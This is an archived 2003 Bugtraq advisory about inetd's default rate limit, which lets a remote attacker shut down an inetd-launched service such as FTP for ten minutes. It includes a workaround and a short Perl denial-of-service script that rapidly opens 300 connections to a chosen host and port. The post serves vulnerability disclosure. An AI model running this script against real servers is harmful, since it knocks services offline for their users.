11 years of inetd default insecurity?

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: 11 years of inetd default insecurity?
From: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>
Date: Sat, 6 Sep 2003 18:08:22 +0400
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Organization: http://www.security.nnov.ru
Reply-to: 3APA3A <3APA3A@xxxxxxxxxxxxxxxx>

Dear bugtraq@xxxxxxxxxxxxxxxxx,

Well,  we all blame Microsoft in insecure default configuration... Isn't
it time to clean outdated code in Unix?

I. Intro

Saint_Byte reported DoS vulnerability in wu-ftp. Small perl script (like
one  below) kills ftp service... With closer look we have good old inetd
feature   a  lot  of  existing  FreeBSD/linux  installations  are  still
vulnerable.  This  problem  is  known  since  ancient  time  [1] and was
discussed  again  and again, but still present. In fact, problem is well
known.  It's  just  another  rake everyone steps to. It's on any man and
FAQ, but may be it's time to resolve it? Because it's definitely a BUG.

II. Who is vulnerable

Any system shipped with network daemons launched through inetd (FreeBSD,
SuSE, Red Hat, etc.).

III. Details

Inetd has an option

     -R rate
             Specify the maximum number of times a service can be invoked in 
             one minute; the default is 256.  A rate of 0 allows an unlimited
             number of invocations.

The  problem  is,  remote attacker can establish as much connections per
minute  as  bandwidth allows... Now, guess how inetd reacts if more than
256 connections received in one minute? It will disable service for next
10   minutes   to  help attack to succeed. Of cause, this is documented.
Interval is not configurable.

something like

Jul 23 15:27:10 host inetd[86]: ftp/tcp server failing (looping), service 
terminated

will  appear  in  logs...  If  connection  is  closed by attacker before
service actually starts, IP address of attacker will never be logged.

IV. Workaround

-R 0 -s your_ad_can_be_here

or ask everyone to do not bother your server.

V. inetd-DoS-by-default-11-years-anniversary-super-exploit.pl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#!/usr/bin/perl

use Socket;
$host=@ARGV[0];
$port=@ARGV[1];
if ($host eq "" || $port eq "") {print "\n Usage progname HOST PORT \n";}
$iadr=inet_aton($host);
$padr=sockaddr_in($port,$iadr);
for($i=0; $i < 300; $i++)
{
 socket(SOCK,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
 connect(SOCK,$padr) or next;
 close(SOCK);
}
print "\nDone\n";
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

VI. References:

[1]Ari Luotonen, "www/tcp server failing (looping), service terminated"
http://www.webhistory.org/www.lists/www-talk.1993q4/0312.html

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)

Follow-Ups:
- Re: 11 years of inetd default insecurity?
  - From: Darren Pilgrim
- Re: 11 years of inetd default insecurity?
  - From: Dan Harkless
- Re: 11 years of inetd default insecurity?
  - From: Mike Tancsa
- Re: 11 years of inetd default insecurity?
  - From: Dagmar d'Surreal
- Re: 11 years of inetd default insecurity?
  - From: Thamer Al-Harbash

Prev by Date: Crash Mozilla 1.5
Next by Date: Remote and Local Vulnerabilities In WS_FTP Server
Previous by thread: Re: Crash Mozilla 1.5
Next by thread: Re: 11 years of inetd default insecurity?
Index(es):
- Date
- Thread